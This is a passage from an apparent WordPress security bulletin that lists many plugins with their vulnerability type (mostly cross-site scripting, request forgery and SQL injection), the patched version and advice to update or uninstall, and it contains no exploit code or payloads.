Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: SQL Injection
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Subscriber+) Sensitive Information Disclosure
Patched Version: 7.4.4
Recommended Action: Update to version 7.4.4, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Not specified in this bulletin (affects versions < 5.2)
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: Album and Image Gallery plus Lightbox

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: WP Athletics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Fastest Cache

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 0.8.3.5
Recommended Action: Update to version 0.8.3.5, or a newer patched version

Plugin: Options for Twenty Seventeen

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: TS Poll – Survey, Versus Poll, Image Poll, Video Poll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: HT Builder – WordPress Theme Builder for Elementor

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Code Injection
Patched Version: 3.0.34.2
Recommended Action: Update to one of the following versions, or a newer patched version: 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, 3.6.11

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.5.7.1
Recommended Action: Update to version 5.5.7.1, or a newer patched version

Plugin: Responsive Vertical Icon Menu

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Embed Swagger

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Missing Authorization to Arbitrary Page/Post Deletion
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: Premium Addons Pro for Elementor

Vulnerability: Missing Authorization
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Product Gallery Slider, Additional Variation Images for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: membermouse

Vulnerability: Blind SQL Injection
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Slideshow

Vulnerability: 2.2.21
Patched Version: 2.2.22
Recommended Action: Update to version 2.2.22, or a newer patched version

Plugin: BxSlider WP

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Free Live Chat Support

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Roomcloud

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation

Vulnerability: Authenticated (Subscriber+) Sensitive Information Disclosure via Shortcode
Patched Version: 2.12.2
Recommended Action: Update to version 2.12.2, or a newer patched version

Plugin: Analyticator

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 6.5.6
Recommended Action: Update to version 6.5.6, or a newer patched version

Plugin: Asset CleanUp: Page Speed Booster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.6.7
Recommended Action: Update to version 1.3.6.7, or a newer patched version

Plugin: Chatbot for WordPress by Collect.chat ⚡️

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Gallery Images Ape

Vulnerability: Authenticated Plugin Deactivation
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Post Content XMLRPC

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sniplets

Vulnerability: Remote Code Execution
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Contact Form 7 Widget For Elementor Page Builder & Gutenberg Blocks

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: wpslacksync

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Unauthenticated MailChimp API Key Disclosure
Patched Version: 5.8.2
Recommended Action: Update to version 5.8.2, or a newer patched version

Plugin: Perfect Survey

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: External url as post Featured Image (thumbnail)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.03
Recommended Action: Update to version 2.03, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Multiple Reflected Cross-Site Scripting
Patched Version: 2.9.52
Recommended Action: Update to version 2.9.52, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.0.21
Recommended Action: Update to version 2.0.21, or a newer patched version

Plugin: CMP – Coming Soon & Maintenance Plugin by NiteoThemes

Vulnerability: Information Exposure
Patched Version: 4.1.7
Recommended Action: Update to version 4.1.7, or a newer patched version

Plugin: VK Blocks Pro

Vulnerability: Stored (Contributor+) Cross-Site Scripting in Tag Edit
Patched Version: 1.54.0
Recommended Action: Update to version 1.54.0, or a newer patched version

Plugin: WP Scrippets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Cross-Site Request Forgery via update_rating
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Export Post Info

Vulnerability: Authenticated (Author+) CSV Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: User Meta Manager

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Missing Authorization
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Print, PDF, Email by PrintFriendly

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 5.5.2
Recommended Action: Update to version 5.5.2, or a newer patched version

Plugin: OnePress Social Locker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.5
Recommended Action: Update to version 4.2.5, or a newer patched version

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Category List Portfolio Page

Vulnerability: Remote File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Us all-in-one button

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: Coming soon and Maintenance mode

Vulnerability: Missing Authorization to Arbitrary Email Send
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: WP All Backup

Vulnerability: Cross-Site Request Forgery to Backup Storage Modification
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Similar Posts – Best Related Posts Plugin for WordPress

Vulnerability: Admin+ Arbitrary PHP Code Execution
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Notification – Custom Notifications and Alerts for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 8.0.0
Recommended Action: Update to version 8.0.0, or a newer patched version

Plugin: Custom Product Tabs for WooCommerce

Vulnerability: Subscriber+ Settings Update
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Cab Grid

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: SecureMoz Security Audit

Vulnerability: PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post List Designer by Category – List Category Post Or Recent Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: WooDiscuz – WooCommerce Comments

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Strong Testimonials

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.11
Recommended Action: Update to version 3.1.11, or a newer patched version

Plugin: Safe Editor

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: GD Rating System

Vulnerability: Directory Traversal
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: WP eCommerce Shop Styling

Vulnerability: Remote File Inclusion
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Call&Book Mobile Bar

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPS Hide Login

Vulnerability: Hidden Login Page Location Disclosure
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Sliced Invoices – WordPress Invoice Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Poll, Survey & Quiz Maker Plugin by Opinion Stage

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 19.6.25
Recommended Action: Update to version 19.6.25, or a newer patched version

Plugin: Easy Digital Downloads – Cross-Sell and Upsell

Vulnerability: Cross-Sell and Upsell <= 1.1.2
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: MomentoPress for Momento360

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: No subtitle
Patched Version: 4.13.2
Recommended Action: Update to version 4.13.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Stored Cross-Site Scripting via REST-API
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: Login Widget With Shortcode

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: AGCA – Custom Dashboard & Login Page

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.5.5
Recommended Action: Update to version 6.5.5, or a newer patched version

Plugin: WP-UserOnline

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.88.3
Recommended Action: Update to version 2.88.3, or a newer patched version

Plugin: Phlox Shop

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Apollo13 Framework Extensions

Vulnerability: Missing Authorization
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.4.5
Recommended Action: Update to version 7.4.5, or a newer patched version

Plugin: Web Push Notifications – Webpushr

Vulnerability: Cross-Site Request Forgery to Local File Inclusion via menu
Patched Version: 4.35.0
Recommended Action: Update to version 4.35.0, or a newer patched version

Plugin: Widget Settings Importer/Exporter

Vulnerability: Unauthorized Widget Import to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analyticator

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 6.5.6
Recommended Action: Update to version 6.5.6, or a newer patched version

Plugin: OWM Weather

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 5.6.9
Recommended Action: Update to version 5.6.9, or a newer patched version

Plugin: WooSidebars

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Add User Role

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Unauthenticated SQL Injection
Patched Version: 6.67
Recommended Action: Update to version 6.67, or a newer patched version

Plugin: Twittee Text Tweet

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.32
Recommended Action: Update to version 2.0.32, or a newer patched version

Plugin: One User Avatar | User Profile Picture

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: YITH Easy Login & Register Popup for WooCommerce

Vulnerability: Authentication Bypass via Password Reset
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Name Directory

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: Advanced Category Template

Vulnerability: Stored Cross-Site Scripting via Cross-Site Request Forgery in _form.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO SearchTerms Tagging 2

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LiteSpeed Cache

Vulnerability: Missing Authorization to Toggle Crawler State
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: PHP Object Injection
Patched Version: 4.02.01
Recommended Action: Update to version 4.02.01, or a newer patched version

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 1.0.73
Recommended Action: Update to version 1.0.73, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: WP All Import Pro

Vulnerability: Missing Authorization Checks
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Cross-Site Request Forgery to Google Drive Storage Update
Patched Version: 1.23.11
Recommended Action: Update to version 1.23.11, or a newer patched version

Plugin: Client Logo Carousel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: WP-ShowHide

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.05
Recommended Action: Update to version 1.05, or a newer patched version

Plugin: Strong Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Client+) Stored Cross-Site Scripting
Patched Version: 5.5.1
Recommended Action: Update to version 5.5.1, or a newer patched version

Plugin: WP24 Domain Check

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.18
Recommended Action: Update to version 2.0.18, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Authenticated (Shop manager+) SQL Injection via currency parameters
Patched Version: 5.9.1
Recommended Action: Update to version 5.9.1, or a newer patched version

Plugin: Zengo Custom Thumbnail Image Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visual Portfolio, Photo Gallery & Post Grid

Vulnerability: Unauthenticated CSS Injection
Patched Version: 2.18.0
Recommended Action: Update to version 2.18.0, or a newer patched version

Plugin: WP Activity Log

Vulnerability: Cross-Site Request Forgery via ajax_run_cleanup
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: WooCommerce Conversion Tracking

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Image/Banner Widget

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shortcodes by Angie Makes

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Eazy Plugin Manager – Powerful Plugin Management Solution for WordPress

Vulnerability: Missing Authorization via update_options
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Request Forgery on Settings
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: YouTube Video Gallery by YouTube Showcase – Video Gallery Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.6
Recommended Action: Update to version 3.3.6, or a newer patched version

Plugin: WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: Logs Deletion via Cross-Site Request Forgery
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: WooCommerce Multi Currency

Vulnerability: Missing Authorization
Patched Version: 2.1.18
Recommended Action: Update to version 2.1.18, or a newer patched version

Plugin: No Page Comment

Vulnerability: Cross-Site Request Forgery to Settings Change
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: wp-easybooking

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Team Manager

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Total Security

Vulnerability: Unauthenticated Settings Change
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Easy Contact Form Builder

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Sayfa Sayac

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: So Audible Cloud Music Player

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Polls

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.71
Recommended Action: Update to version 2.71, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via html_tag
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Tevolution

Vulnerability: Arbitrary File Upload
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Language Bar Flags

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Better Find and Replace

Vulnerability: Admin+ SQL Injection
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: CRM and Lead Management by vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Arbitrary Post Duplication
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Parcel Tracker eCourier

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: intimate Payments Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: [GWA] AutoResponder

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Marketing Twitter Bot

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Membership Simplified

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SP Rental Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form DB – Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: tarteaucitron.js – Cookies legislation & GDPR

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in save_admin_widgets function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Auto Amazon Links – Amazon Associates Affiliate Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘bulkDelete’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Copy or Move Comments

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Baidu Tongji generator

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Organization chart

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: WP EasyPay – Create Your Payment Forms to Pay with Square – Square for WordPress Plugin: Integrate Square with WordPress to Collect Payments

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Contact Us Page – Contact People

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 6.6.16
Recommended Action: Update to version 6.6.16, or a newer patched version

Plugin: Brute Force Login Protection

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Learn Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Missing Authorization
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: Real-Time Find and Replace

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Product Carousel, Product Slider, Product Grid Gallery, and Product Table for WooCommerce – WooProduct Slider

Vulnerability: Missing Authorization
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Email Spoofing
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: OpenID Connect Generic Client

